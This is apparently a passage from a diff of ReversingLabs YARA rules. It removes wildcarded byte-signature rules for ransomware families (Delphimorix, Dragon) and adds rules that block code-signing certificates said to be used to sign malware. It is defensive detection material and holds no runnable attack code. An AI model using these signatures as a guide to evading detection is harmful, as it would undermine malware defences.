48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? - ?? 5B 5D C3 - } - $remote_connection_p1 = { - 55 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8B 05 ?? ?? - ?? ?? FF D0 89 C1 E8 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 85 ?? ?? - ?? ?? 41 89 D0 48 89 C2 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 05 ?? - ?? ?? ?? FF D0 89 C1 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 BA ?? ?? ?? ?? 89 C8 F7 EA - C1 FA ?? 89 C8 C1 F8 ?? 29 C2 89 D0 69 C0 ?? ?? ?? ?? 29 C1 89 C8 8D 88 ?? ?? ?? ?? - 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 41 89 C9 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 48 - 8B 05 ?? ?? ?? ?? FF D0 C7 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? - BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? - 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? - ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? - 0F 84 ?? ?? ?? ?? 48 8D 45 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 48 - 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? - ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB - ?? 8B 8D ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? - 48 C7 44 24 ?? ?? ?? ?? ?? 4D 89 C1 41 89 C8 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 B8 - ?? ?? ?? ?? 44 8D 40 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? - ?? 49 89 C9 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 85 C0 - } - $remote_connection_p2 = { - 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? - ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 - 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 - 48 8B 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 - 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? C6 85 ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 - 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 - 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? - ?? ?? ?? FF D0 0F B6 85 ?? ?? ?? ?? 83 F0 ?? 84 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 89 C1 BA ?? ?? ?? ?? 89 C8 F7 EA C1 FA ?? 89 C8 C1 F8 ?? 29 C2 89 D0 69 C0 ?? ?? ?? - ?? 29 C1 89 C8 8D 88 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 41 89 C9 49 89 D0 - 48 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 C7 44 24 ?? - ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89 C0 48 8B 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 85 C0 0F 94 C0 84 C0 74 ?? 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 - ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 48 8B - 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 89 C1 - E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? 5D C3 - } - $find_files = { - 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 F8 ?? 0F 95 C0 84 C0 74 ?? BB ?? - ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? - ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C2 48 8B 0D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? - 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? - ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 - ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 - 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 10 48 83 EA ?? 48 8B 12 - 48 01 D0 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 0F 95 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8B 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? - ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? BB ?? ?? ?? ?? EB ?? 90 BB ?? ?? ?? ?? 48 - 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? BB ?? ?? ?? ?? EB ?? 90 BB - ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? E9 ?? ?? ?? ?? 90 E9 - ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 - 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? - ?? 48 89 C1 E8 ?? ?? ?? ?? E9 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rabah Azrarak" and pe.signatures[i].serial=="0e:cd:46:0c:e1:4b:d8:ef:29:26:da:2c:d9:a4:41:76" and 1463035153<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Delphimorix : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_5E75E997F3D70Bb8C182D56B25B7D836 : INFO FILE { meta: - description = "Yara rule that detects Delphimorix ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1f964601-9819-5597-ba6e-db3a30e3aa5a" - date = "2020-07-15" - modified = "2020-07-15" + id = "3578b97f-1d87-517a-8ea9-17606017e46a" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Delphimorix.yara#L1-L67" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6d401d488d57b2d75e93a1dfd47ece687a5791d1f0a52768300f4af8a8787212" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12666-L12682" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a2c6a57759fb0717951f83a32c00deeae82cad772b6cb7f60fa96232b6b82560" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Delphimorix" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 - 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? 8B - 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 68 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? - ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B C3 - 8B 10 FF 12 52 50 B9 ?? ?? ?? ?? 8B D3 8B C6 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B - C6 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 - ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 59 59 5D C3 - } - $find_files_p1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? - ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B D9 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? - ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 - ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? - ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? - ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 - } - $find_files_p2 = { - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? - ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B - C6 83 C8 ?? 3B C6 75 ?? 80 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF 75 ?? 68 ?? ?? ?? - ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? - ?? ?? ?? C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Primetech Ltd." and pe.signatures[i].serial=="5e:75:e9:97:f3:d7:0b:b8:c1:82:d5:6b:25:b7:d8:36" and 1324252800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_D5690D94F15315E143Db10Af35497Dc5 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "324b2e2f-bad7-5ac4-864c-044d99fa01dc" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12684-L12702" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4ac17d0f0e4ef2bb5f6cda8e7cb07a641d49c83465a0a80c46ff6e0e752d1847" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PET SERVICES d.o.o." and (pe.signatures[i].serial=="00:d5:69:0d:94:f1:53:15:e1:43:db:10:af:35:49:7d:c5" or pe.signatures[i].serial=="d5:69:0d:94:f1:53:15:e1:43:db:10:af:35:49:7d:c5") and 1576195200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Dragon : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_8223C74185Add0927246F5E33Ebac467 : INFO FILE { meta: - description = "Yara rule that detects Dragon ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "dbeab955-f1fe-57eb-a9a4-c8c885ab7fad" - date = "2020-10-30" - modified = "2020-10-30" + id = "dfe87130-7b2f-5f8a-8c2d-8653c2bd0cd3" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Dragon.yara#L1-L149" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7298c5681deaf04abb6a656cefc09b5ee4096ff7a5028caab1d7b107e97be90a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12704-L12722" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f700b4f7cdfda9f678c3a5259d4293640c50567ec277c5b3db69756534e2007f" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Dragon" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 85 C0 0F 85 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? 83 EC ?? 89 45 ?? 8B - CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC E8 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8B D0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 - 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? - ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? - ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? - ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 - } - $remote_connection_p2 = { - 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? - 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? - ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F - 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 4D ?? 8D 55 ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? 0F 43 4D ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 83 FA - ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? - 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B - 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? - 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $find_files_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 83 EC ?? 89 8D ?? - ?? ?? ?? 8B D4 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 ?? 8A 01 41 - 84 C0 75 ?? 2B CE 8B B5 ?? ?? ?? ?? 51 56 8B CA E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D - 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 8B 1D - } - $find_files_2 = { - 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? - 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 ?? 83 C1 ?? 83 C0 ?? 84 D2 75 ?? - 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? - ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 51 8B D4 8D 8D ?? ?? ?? ?? - 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 ?? 8A 01 41 84 C0 75 ?? 2B - CE 8D 85 ?? ?? ?? ?? 51 50 8B CA E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? - 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 57 FF D3 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F - 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $skip_hk_china_taiwan_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? - 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? 89 45 ?? 8D 4D ?? 6A ?? - 68 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D - 4D ?? 83 7D ?? ?? 8D 55 ?? 0F 43 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? - 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 - ?? 0F 85 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? - ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? - 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 - C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 - ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 - ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ?? - ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 - } - $skip_hk_china_taiwan_p2 = { - 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 - 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? - ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 - C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? - 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 55 ?? - 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 - C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 - ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 - ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ?? - ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? - 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 - 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 